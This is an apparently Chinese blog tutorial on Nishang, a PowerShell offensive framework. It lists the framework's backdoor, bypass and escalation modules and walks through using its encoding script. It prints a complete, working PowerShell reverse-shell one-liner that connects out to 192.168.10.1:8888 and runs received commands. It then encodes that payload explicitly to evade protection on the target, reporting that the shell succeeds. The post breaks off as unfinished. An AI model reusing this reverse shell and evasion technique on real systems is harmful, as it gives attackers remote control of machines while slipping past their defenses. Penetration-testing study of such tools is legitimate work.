PowerShell渗透工具Nishang

目录

Nishang

Nishang的目录结构

Nishang的使用

Invoke-Decode.ps1


Nishang

Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本,被广泛用于渗透测试的各个阶段。Nishang在PowerShell3.0及以上的环境中才能正常使用,所以Windows7、Server2008下默认是有点小问题的。项目地址:https://github.com/samratashok/nishang

Nishang的目录结构

  • ActiveDirectory:活动目录
  • Antak-WebShell:WebShell
  • Backdoors:后门
  • Bypass:绕过
  • Client:客户端
  • Escalation:提权
  • Execution:执行
  • Gather:信息收集
  • MITM:
  • Misc:发音
  • Pivot:跳板、远程执行exe
  • Prasadhak:Virustotal 
  • Scan:扫描
  • Shells:shell
  • Utility:杂项
  • Powerpreter:Meterpreter会话

Nishang的使用

导入所有的脚本到当前的PowerShell会话中(PowerShell v3之前)

Import-Module -verbose  .\nishang.psm1
 
 

然后输入命令:Get-Command -Module nishang   查看nishang有哪些功能

Invoke-Decode.ps1

该脚本是Nishang的Utility目录下的,该脚本用于对payload进行编码。

例如,我们现在想利用powershell反弹shell。

我们在服务端使用powercat进行监听

我们在客户端的反弹shell的脚本如下,名为 reverse.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.10.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 
 

但是由于客户端机器存在防护,直接指向该脚本反弹不了shell。所以,我们现在就利用 Invoke-Encode.ps1脚本对reverse.ps1进行编码。执行完成后,会生成两个文件:encoded.txt 和 encodedcommand.txt,前者是编码的数据,后者是编码后的命令。


 
 
  1. Import-Module .\Invoke-Encode.ps 1
  2. Invoke-Encode -DataToEncode .\reverse.ps 1 -OutCommand

我们复制encodedcommand.txt 里面的命令,在powershell中执行,可以看到,反弹shell成功。

未完待续。。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值